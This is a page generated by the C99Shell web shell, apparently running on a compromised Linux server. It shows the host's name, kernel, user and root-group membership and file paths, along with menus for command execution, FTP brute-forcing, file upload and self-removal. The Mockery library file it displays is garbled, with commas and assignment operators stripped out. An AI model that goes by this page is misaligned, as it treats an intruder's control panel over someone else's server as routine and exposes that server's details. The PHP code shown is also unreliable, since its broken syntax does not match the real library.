!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/vendor/mockery/mockery/library/Mockery/   drwxr-xr-x
Free 29.34 GB of 117.98 GB (24.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VerificationDirector.php (3.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Mockery (https://docs.mockery.io/)
 *
 * @copyright https://github.com/mockery/mockery/blob/HEAD/COPYRIGHT.md
 * @license https://github.com/mockery/mockery/blob/HEAD/LICENSE BSD 3-Clause License
 * @link https://github.com/mockery/mockery for the canonical source repository
 */

namespace Mockery;

class 
VerificationDirector
{
    
/**
     * @var VerificationExpectation
     */
    
private $expectation;

    
/**
     * @var ReceivedMethodCalls
     */
    
private $receivedMethodCalls;

    public function 
__construct(ReceivedMethodCalls $receivedMethodCallsVerificationExpectation $expectation)
    {
        
$this->receivedMethodCalls $receivedMethodCalls;
        
$this->expectation $expectation;
    }

    
/**
     * @return self
     */
    
public function atLeast()
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('atLeast', []);
    }

    
/**
     * @return self
     */
    
public function atMost()
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('atMost', []);
    }

    
/**
     * @param int $minimum
     * @param int $maximum
     *
     * @return self
     */
    
public function between($minimum$maximum)
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('between', [$minimum$maximum]);
    }

    
/**
     * @return self
     */
    
public function once()
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('once', []);
    }

    
/**
     * @param int $limit
     *
     * @return self
     */
    
public function times($limit null)
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('times', [$limit]);
    }

    
/**
     * @return self
     */
    
public function twice()
    {
        return 
$this->cloneWithoutCountValidatorsApplyAndVerify('twice', []);
    }

    public function 
verify()
    {
        
$this->receivedMethodCalls->verify($this->expectation);
    }

    
/**
     * @template TArgs
     *
     * @param TArgs $args
     *
     * @return self
     */
    
public function with(...$args)
    {
        return 
$this->cloneApplyAndVerify('with'$args);
    }

    
/**
     * @return self
     */
    
public function withAnyArgs()
    {
        return 
$this->cloneApplyAndVerify('withAnyArgs', []);
    }

    
/**
     * @template TArgs
     *
     * @param TArgs $args
     *
     * @return self
     */
    
public function withArgs($args)
    {
        return 
$this->cloneApplyAndVerify('withArgs', [$args]);
    }

    
/**
     * @return self
     */
    
public function withNoArgs()
    {
        return 
$this->cloneApplyAndVerify('withNoArgs', []);
    }

    
/**
     * @param string $method
     * @param array  $args
     *
     * @return self
     */
    
protected function cloneApplyAndVerify($method$args)
    {
        
$verificationExpectation = clone $this->expectation;

        
$verificationExpectation->{$method}(...$args);

        
$verificationDirector = new self($this->receivedMethodCalls$verificationExpectation);

        
$verificationDirector->verify();

        return 
$verificationDirector;
    }

    
/**
     * @param string $method
     * @param array  $args
     *
     * @return self
     */
    
protected function cloneWithoutCountValidatorsApplyAndVerify($method$args)
    {
        
$verificationExpectation = clone $this->expectation;

        
$verificationExpectation->clearCountValidators();

        
$verificationExpectation->{$method}(...$args);

        
$verificationDirector = new self($this->receivedMethodCalls$verificationExpectation);

        
$verificationDirector->verify();

        return 
$verificationDirector;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--